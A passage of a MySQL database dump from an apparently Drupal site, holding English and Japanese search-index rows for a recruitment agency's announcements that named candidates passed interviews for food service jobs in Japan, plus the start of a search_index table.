されま れまし ました  ', 0),
(191, 'en', 'node_search', ' hard work recognized through interview success hard work recognized through interview success admin sat 6202026 1141 thu 1222026 942 interview success announcement new comet trading agency is pleased to share the successful interview result of ms ei ei khet who has passed the interview for a specified skilled worker food service position in japan behind every successful interview is a period of learning preparation and personal effort through her dedication and positive attitude she has achieved an important milestone on her journey toward working in japan this success reflects her commitment to personal growth and her determination to pursue new opportunities abroad we warmly congratulate ms ei ei khet on this achievement and wish her continued success as she proceeds to the next stage of her journey toward employment in japan ms ei ei khet successfully passed the interview for a specified skilled worker food service position in japan   ', 0),
(191, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1143 thu 1222026 942  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは ei ei khet さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 面接合 接合格 合格の 格の裏 の裏に 裏には 日 々 の学習 学習や 習や準 や準備 そして してご てご本 ご本人 本人の 人の努 の努力 努力が 力があ があり ありま ります 今回の 回の成 の成果 成果は その積 の積み 積み重 み重ね 重ねが ねが実 が実を 実を結 を結ん 結んだ んだ結 だ結果 結果で 果です この合 の合格 合格は 日本で 本で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた大 た大切 大切な 切な節 な節目 節目で 目であ であり 新たな たな可 な可能 可能性 能性へ 性への への第 の第一 第一歩 一歩と 歩とな となり なりま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します  ei ei khet さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(192, 'en', 'node_search', ' persistence and dedication result in interview success persistence and dedication result in interview success admin sat 6202026 1144 wed 1212026 945 interview success announcement new comet trading agency is delighted to announce that ms sabi oo has successfully passed the interview for a specified skilled worker food service position in japan this achievement is the result of her persistence dedication and continuous efforts to pursue employment opportunities in japan through careful preparation and determination she has successfully reached an important milestone in her professional journey passing the interview opens the door to valuable experiences and future career development within japan s food service industry we sincerely congratulate ms sabi oo on this accomplishment and wish her success throughout the upcoming procedures and her future career in japan ms sabi oo successfully passed the interview for a specified skilled worker food service position in japan  ', 0),
(192, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1146 wed 1212026 945  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは sabi oo さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の粘 の粘り 粘り強 り強い 強い努 い努力 努力と 力と継 と継続 継続的 続的な 的な学 な学習 そして して日 て日本 日本で 本で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた強 た強い 強い意 い意志 意志の 志の成 の成果 成果で 果です 面接合 接合格 合格は 日本の 本の外 の外食 外食業 食業界 業界で 界で活 で活躍 活躍す 躍する するた るため ための めの大 の大切 大切な 切な第 な第一 第一歩 一歩で 歩であ であり 今後さ 後さら さらな らなる なる成 る成長 成長と 長と経 と経験 経験に 験につ につな つなが ながる がる機 る機会 機会と 会とな となり なりま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 日本で 本での でのご のご活 ご活躍 活躍と 躍と明 と明る 明るい るい未 い未来 未来を 来をお をお祈 お祈り 祈りい りいた いたし たしま します  sabi oo さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(193, 'en', 'node_search', ' interview success marks the beginning of new opportunities interview success marks the beginning of new opportunities admin sat 6202026 1147 wed 1212026 948 interview success announcement new comet trading agency is pleased to announce that ms thwel thwel aye has successfully passed the interview for a specified skilled worker food service position in japan her achievement reflects the confidence preparation and determination she demonstrated throughout the recruitment process successfully completing the interview is an important step toward achieving her professional goals in japan this opportunity will allow her to gain valuable experience develop new skills and build a successful future within japan s food service industry we extend our sincere congratulations to ms thwel thwel aye and wish her continued success as she prepares for the next stage of her journey ms thwel thwel aye successfully passed the interview for a specified skilled worker food service position in japan ', 0),
(193, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1149 wed 1212026 948  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは thwel thwel aye さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の自 の自信 努力 そして して準 て準備 準備の 備の成 の成果 成果で 果であ であり 日本で 本での でのキ のキャ キャリ ャリア リア実 ア実現 実現に 現に向 に向け 向けた けた大 た大切 大切な 切な一 な一歩 一歩と 歩とな となり なりま りまし ました 外食業 食業界 業界で 界での での経 の経験 経験を 験を通 を通じ 通じて 多くの くの知 の知識 知識や 識や技 や技術 技術を 術を身 を身に 身につ につけ さらな らなる なる成 る成長 成長に 長につ につな つなが ながる がるこ ること ことが とが期 が期待 期待さ 待され されま れます 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します  thwel thwel aye さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(194, 'en', 'node_search', ' successful interview opens the door to international experience successful interview opens the door to international experience admin sat 6202026 1204 wed 1212026 956 interview success announcement new comet trading agency is delighted to announce that ms moe moe zaw has successfully passed the interview for a specified skilled worker food service position in japan this achievement marks an exciting opportunity for her to gain international work experience and further develop her professional skills within japan s food service industry through dedication preparation and a positive attitude she successfully completed the interview process and moved one step closer to achieving her career goals we congratulate ms moe moe zaw on this accomplishment and wish her continued success throughout the remaining procedures and her future employment in japan we look forward to seeing her grow and thrive in her upcoming professional journey ms moe moe zaw successfully passed the interview for a specified skilled worker food service position in japan ', 0),
(194, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1256 wed 1212026 956  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは moe moe zaw さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格に 格によ により 日本の 本の外 の外食 外食業 食業界 業界で 界で国 で国際 国際的 際的な 的な職 な職業 職業経 業経験 経験を 験を積 を積む 積むた むため ための めの大 の大き 大きな きなチ なチャ チャン ャンス ンスを スを手 を手に 手にさ にされ されま れまし ました ご本人 本人の 人の努 の努力 努力と 力と前 と前向 前向き 向きな きな姿 な姿勢 そして して十 て十分 十分な 分な準 な準備 準備が 備が今 が今回 今回の 回の素 の素晴 素晴ら 晴らし らしい しい結 い結果 結果に 果につ につな つなが ながり がりま りまし ました 今後の 後の手 の手続 手続き 続きが きが順 が順調 順調に 調に進 に進み 日本で 本で多 で多く 多くの くの経 の経験 経験と 験と成 と成長 成長の 長の機 の機会 機会を 会を得 を得ら 得られ られる れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります ご合格 誠にお におめ おめで めでと でとう とうご うござ ござい ざいま います  moe moe zaw さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(195, 'en', 'node_search', ' building skills and opportunities through success building skills and opportunities through success admin sat 6202026 1300 wed 1212026 901 interview success announcement new comet trading agency is pleased to announce that ms ei ei phyoe has successfully passed the interview for a specified skilled worker food service position in japan this achievement reflects her commitment to learning selfimprovement and preparation for international employment opportunities as she moves forward in the recruitment process she will have the opportunity to apply her knowledge and skills within japan s food service industry while continuing to develop professionally we are proud of her accomplishment and extend our sincere congratulations on this important milestone we wish ms ei ei phyoe every success in the next stage of her journey and look forward to her future achievements in japan ms ei ei phyoe successfully passed the interview for a specified skilled worker food service position in japan  ', 0),
(195, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1303 wed 1212026 901  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは ei ei phyoe さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の学 の学習 学習意 習意欲 意欲と 欲と努 と努力 そして して将 て将来 将来に 来に向 に向け 向けた けた準 た準備 準備の 備の成 の成果 成果で 果です 今後 日本の 本の外 の外食 外食業 食業界 業界で 界で知 で知識 知識や 識や技 や技術 技術を 術を活 を活か 活かし かしな しなが ながら さらに らに成 に成長 成長し 長し活 し活躍 活躍さ 躍され される れるこ ること ことが とが期 が期待 期待さ 待され されま れます この素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果を 果を心 を心よ 心より よりお りお祝 お祝い 祝いす いする すると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈り申 り申し 申し上 し上げ 上げま げます ei ei phyoe さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(196, 'en', 'node_search', ' determination leads to interview success determination leads to interview success admin sat 6202026 1304 wed 1212026 904 interview success announcement new comet trading agency is proud to announce that ms win win thu has successfully passed the interview for a specified skilled worker food service position in japan this achievement is the result of determination perseverance and continuous effort toward achieving her goal of working in japan each successful interview represents an important step toward a brighter future and greater professional opportunities through her preparation and dedication she has successfully moved one step closer to beginning her career in japan s food service industry we sincerely congratulate ms win win thu on this accomplishment and wish her continued success throughout the remaining procedures and her future journey in japan ms win win thu successfully passed the interview for a specified skilled worker food service position in japan ', 0),
(196, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1311 wed 1212026 904  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは win win thu さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と粘 と粘り 粘り強 り強い 強い挑 い挑戦 挑戦の 戦の成 の成果 成果で 果であ であり 日本で 本で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた大 た大き 大きな きな前 な前進 前進と 進とな となり なりま りまし ました 面接合 接合格 合格は 将来の 来の可 の可能 可能性 能性を 性を広 を広げ 広げる げる重 る重要 重要な 要な一 な一歩 一歩で 歩であ であり 新たな たなキ なキャ キャリ ャリア リアへ アへの へのス のスタ スター タート ートで トでも でもあ もあり ありま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 日本で 本での でのご のご活 ご活躍 活躍と 躍とさ とさら さらな らなる なる成 る成功 成功を 功をお をお祈 お祈り 祈りい りいた いたし たしま します  win win thu さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(197, 'en', 'node_search', ' interview success opens new possibilities in japan interview success opens new possibilities in japan admin sat 6202026 1313 mon 1192026 917 interview success announcement new comet trading agency is pleased to announce that ms tun eaindar moe has successfully passed the interview for a specified skilled worker food service position in japan this achievement represents more than a successful interview it is the beginning of new possibilities and future opportunities in an international working environment through dedication preparation and a positive mindset she has successfully earned the opportunity to move forward toward employment in japan s food service sector we are delighted to celebrate this important milestone and look forward to seeing her continue to grow both personally and professionally congratulations to ms tun eaindar moe and we wish her every success in the next stage of her journey ms tun eaindar moe successfully passed the interview for a specified skilled worker food service position in japan ', 0),
(197, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1318 mon 1192026 917  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは tun eaindar moe さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は 単なる なる面 る面接 面接成 接成功 成功に 功にと にとど とどま どまら まらず 日本で 本での での新 の新た 新たな たな可 な可能 可能性 能性と 性と将 と将来 将来へ 来への への第 の第一 第一歩 一歩と 歩とな となる なる大 る大切 大切な 切な成 な成果 成果で 果です ご本人 本人の 人の努 の努力 努力と 力と前 と前向 前向き 向きな きな姿 な姿勢 そして して十 て十分 十分な 分な準 な準備 準備が 備が今 が今回 今回の 回の素 の素晴 素晴ら 晴らし らしい しい結 い結果 結果に 果につ につな つなが ながり がりま りまし ました 今後 日本で 本で多 で多く 多くの くの経 の経験 経験を 験を積 を積み 積みな みなが ながら がら成 ら成長 成長さ 長され される れるこ ること ことを とを心 を心よ 心より より期 り期待 期待し 待して してお ており おりま ります ご合格 誠にお におめ おめで めでと でとう とうご うござ ござい ざいま います  tun eaindar moe さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(198, 'en', 'node_search', ' a significant achievement toward a career in japan a significant achievement toward a career in japan admin sat 6202026 1322 mon 1192026 923 interview success announcement new comet trading agency is pleased to announce that ms mai thandar naing has successfully passed the interview for a specified skilled worker food service position in japan this achievement reflects her dedication hard work and commitment to pursuing new career opportunities abroad passing the interview is an important accomplishment that brings her one step closer to achieving her professional goals the food service sector in japan provides valuable opportunities to gain practical experience develop workplace skills and build a strong foundation for future career growth we are proud of her success and extend our heartfelt congratulations on this important milestone we wish her continued success in the next stages of the process and in her future career in japan ms mai thandar naing successfully passed the interview for a specified skilled worker food service position in japan  ', 0),
(198, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1327 mon 1192026 923  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは mai thandar naing さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と熱 と熱意 熱意の 意の成 の成果 成果で 果であ であり 日本で 本での でのキ のキャ キャリ ャリア リア実 ア実現 実現に 現に向 に向け 向けた けた大 た大切 大切な 切な前 な前進 前進と 進とな となり なりま りまし ました 日本の 本の外 の外食 外食業 食業界 業界で 界では 多くの くの実 の実務 実務経 務経験 経験や 験やス やスキ スキル キル向 ル向上 向上の 上の機 の機会 機会が 会があ があり 今後の 後の成 の成長 成長が 長が期 が期待 期待さ 待され されま れます この素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果を 果を心 を心よ 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します mai thandar naing さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(199, 'en', 'node_search', ' turning effort into success interview passed turning effort into success interview passed admin sat 6202026 1328 mon 1192026 929 interview success announcement new comet trading agency is delighted to announce that ms ei zin htwe has successfully passed the interview for a specified skilled worker food service position in japan every achievement begins with dedication and consistent effort through her commitment to learning and careful preparation she has successfully achieved an important milestone on her path toward employment in japan this accomplishment not only reflects her hard work but also demonstrates her readiness to take on new challenges and opportunities within japan s food service industry we warmly congratulate ms ei zin htwe on her success and wish her the very best as she proceeds to the next stage of her journey ms ei zin htwe successfully passed the interview for a specified skilled worker food service position in japan ', 0),
(199, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1330 mon 1192026 929  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは ei zin htwe さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は 日 々 の努力 努力と 力と継 と継続 継続的 続的な 的な学 な学習 学習の 習の成 の成果 成果で 果であ であり 日本で 本で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた大 た大き 大きな きな前 な前進 前進と 進とな となり なりま りまし ました この成 の成果 成果は ご本人 本人の 人の熱 の熱意 熱意と 意と準 と準備 準備の 備の積 の積み 積み重 み重ね 重ねに ねによ によっ よって って実 て実現 実現し 現した したも たもの もので のであ であり 今後の 後のさ のさら さらな らなる なる成 る成長 成長と 長と活 と活躍 活躍が 躍が期 が期待 期待さ 待され されま れます 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 日本で 本での での新 の新し 新しい しい挑 い挑戦 挑戦が 戦が素 が素晴 素晴ら 晴らし らしい しいも いもの ものと のとな となる なるこ ること ことを とを願 を願っ 願って ってお ており おりま ります  ei zin htwe さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(200, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1333 mon 1192026 932  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは htay htay khaing さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は 新しい しいこ いこと ことに とに挑 に挑戦 挑戦す 戦する する意 る意欲 意欲と 欲と努 と努力 努力の 力の成 の成果 成果で 果であ であり 日本で 本での でのキ のキャ キャリ ャリア リア実 ア実現 実現に 現に向 に向け 向けた けた大 た大切 大切な 切な一 な一歩 一歩と 歩とな となり なりま りまし ました 外食業 食業界 業界で 界での での経 の経験 経験を 験を通 を通じ 通じて 多くの くの知 の知識 知識や 識や技 や技術 技術を 術を身 を身に 身につ につけ さらな らなる なる成 る成長 成長に 長につ につな つなが ながる がるこ ること ことを とを期 を期待 期待し 待して してお ており おりま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します  htay htay khaing さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(204, 'en', 'node_search', ' title 1 title 1 cometadmin wed 8262026 2027 wed 8262026 2004 he librarian at st bride printing library in london took a 1914 cicero translation and scrambled it to make dummy text for letraset s body type sheets it has survived not only many decades but also the leap into ele he librarian at st bride printing library in london took a 1914 cicero translation and scrambled it to make dummy text for letraset s body type sheets it has survived not only many decades but also the leap into ele he librarian at st bride printing library in london took a 1914 cicero translation and scrambled it to make dummy text for letraset s body type sheets it has survived not only many decades but also the leap into ele he librarian at st bride printing library in london took a 1914 cicero translation and scrambled it to make dummy text for letraset s body type sheets it has survived not only many decades but also the leap into ele  ', 0),
(204, 'ja', 'node_search', ' title 1 title 1 cometadmin wed 8262026 1959 wed 8262026 2004 he librarian at st bride printing library in london took a 1914 cicero translation and scrambled it to make dummy text for letraset s body type sheets it has survived not only many decades but also the leap into ele he librarian at st bride printing library in london took a 1914 cicero translation and scrambled it to make dummy text for letraset s body type sheets it has survived not only many decades but also the leap into ele he librarian at st bride printing library in london took a 1914 cicero translation and scrambled it to make dummy text for letraset s body type sheets it has survived not only many decades but also the leap into ele he librarian at st bride printing library in london took a 1914 cicero translation and scrambled it to make dummy text for letraset s body type sheets it has survived not only many decades but also the leap into ele  ', 0),
(205, 'en', 'node_search', ' title 2 title 2 cometadmin wed 8262026 2027 tue 8252026 2023 pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a  ', 0),
(205, 'ja', 'node_search', ' title 2 title 2 cometadmin wed 8262026 2022 tue 8252026 2023 pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a pathlanguagecenter viewlanguagecenter viewsfieldviewnode spanfieldcontent a  ', 0),
(206, 'ja', 'node_search', ' title 3 title 3 cometadmin thu 8272026 2023 fri 8282026 2023 dsfsdfsd sdfs dfsdf sdfsdf sfdsdf sdf sdf sdfsdfs fdsdf  ', 1787923046);

-- --------------------------------------------------------

--
-- Table structure for table `search_index`
--

CREATE TABLE `search_index` (
  `word` varchar(50) NOT NULL DEFAULT '' COMMENT 'The "search_total".word that is associated with the search item.',
  `sid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The "search_dataset".sid of the searchable item to which the word belongs.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The "languages".langcode of the item variant.',
  `type` varchar(64) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The "search_dataset".type of the searchable item to which the word belongs.',
  `score` float DEFAULT NULL COMMENT 'The numeric score of the word, higher being more important.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores the search index, associating words, items and…';

--
-- Dumping data for table `search_index`
--

INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('1', 3, 'ja', 'node_search', 3.61397),
('1', 4, 'en', 'node_search', 2),
('1', 4, 'ja', 'node_search', 2),
('1', 5, 'ja', 'node_search', 2),
('1', 6, 'en', 'help_search', 1),
('1', 6, 'ja', 'help_search', 1),
('1', 6, 'ko', 'help_search', 1),
('1', 8, 'ja', 'node_search', 2),
('1', 10, 'en', 'node_search', 5),
('1', 10, 'ja', 'node_search', 2),
('1', 10, 'ko', 'node_search', 5),
('1', 11, 'en', 'node_search', 3),
('1', 11, 'ja', 'node_search', 3),
('1', 11, 'ko', 'node_search', 3),
('1', 18, 'ja', 'node_search', 1),
('1', 19, 'ja', 'node_search', 28),
('1', 24, 'en', 'node_search', 1),
('1', 24, 'ja', 'node_search', 1),
('1', 24, 'ko', 'node_search', 1),
('1', 27, 'ja', 'node_search', 11),
('1', 30, 'en', 'node_search', 1),
('1', 31, 'en', 'node_search', 1),
('1', 62, 'en', 'node_search', 2.39491),
('1', 62, 'ja', 'node_search', 31.0426),
('1', 122, 'ja', 'node_search', 19),
('1', 133, 'ja', 'node_search', 0.968904),
('1', 138, 'ja', 'node_search', 19),
('1', 140, 'ja', 'node_search', 19),
('1', 142, 'ja', 'node_search', 2),
('1', 163, 'ja', 'node_search', 2.32277),
('1', 174, 'en', 'node_search', 6),
('1', 174, 'ja', 'node_search', 4.72283),
('1', 184, 'ja', 'node_search', 4.76188),
('1', 204, 'en', 'node_search', 27),
('1', 204, 'ja', 'node_search', 27),
('10', 31, 'en', 'node_search', 0.906287),
('10', 126, 'en', 'node_search', 1),
('10', 126, 'ja', 'node_search', 1),
('10', 169, 'en', 'node_search', 5),
('10', 169, 'ja', 'node_search', 4.16849),
('100', 23, 'en', 'node_search', 1),
('100', 23, 'ja', 'node_search', 0.797402),
('100', 23, 'ko', 'node_search', 1),
('100', 27, 'en', 'node_search', 0.643484),
('1026', 187, 'en', 'node_search', 1),
('1028', 187, 'ja', 'node_search', 1),
('1030', 152, 'en', 'node_search', 1),
('1030', 152, 'ja', 'node_search', 1),
('1042024', 126, 'en', 'node_search', 46),
('1042024', 126, 'ja', 'node_search', 46),
('1043', 29, 'en', 'node_search', 1),
('1043', 29, 'ja', 'node_search', 1),
('1043', 29, 'ko', 'node_search', 1),
('1045', 147, 'en', 'node_search', 1),
('1052', 188, 'en', 'node_search', 1),
('1054', 147, 'ja', 'node_search', 1),
('1057', 188, 'ja', 'node_search', 1),
('1080', 163, 'ja', 'node_search', 0.866793),
('1082024', 95, 'en', 'node_search', 1),
('1082024', 95, 'ja', 'node_search', 1),
('11', 155, 'ja', 'node_search', 0.896076),
('1100', 68, 'en', 'node_search', 1),
('1100', 155, 'en', 'node_search', 1),
('1101', 189, 'en', 'node_search', 1),
('1102', 1, 'en', 'node_search', 1),
('11062024', 83, 'en', 'node_search', 1),
('11062024', 83, 'ja', 'node_search', 1),
('1113', 6, 'en', 'node_search', 1),
('1113', 6, 'ja', 'node_search', 1),
('1113', 6, 'ko', 'node_search', 1),
('1113', 66, 'en', 'node_search', 1),
('1114', 67, 'ja', 'node_search', 1),
('1118', 68, 'ja', 'node_search', 1),
('1126', 69, 'ja', 'node_search', 1),
('1130', 189, 'ja', 'node_search', 1),
('1131', 190, 'en', 'node_search', 1),
('1135', 111, 'ja', 'node_search', 1),
('1135am', 111, 'en', 'node_search', 1),
('1139', 190, 'ja', 'node_search', 1),
('1140', 69, 'en', 'node_search', 1),
('1141', 191, 'en', 'node_search', 1),
('1142', 62, 'ja', 'node_search', 1),
('1143', 191, 'ja', 'node_search', 1),
('1144', 192, 'en', 'node_search', 1),
('1145', 3, 'en', 'node_search', 1),
('1146', 3, 'en', 'node_search', 1),
('1146', 3, 'ja', 'node_search', 1),
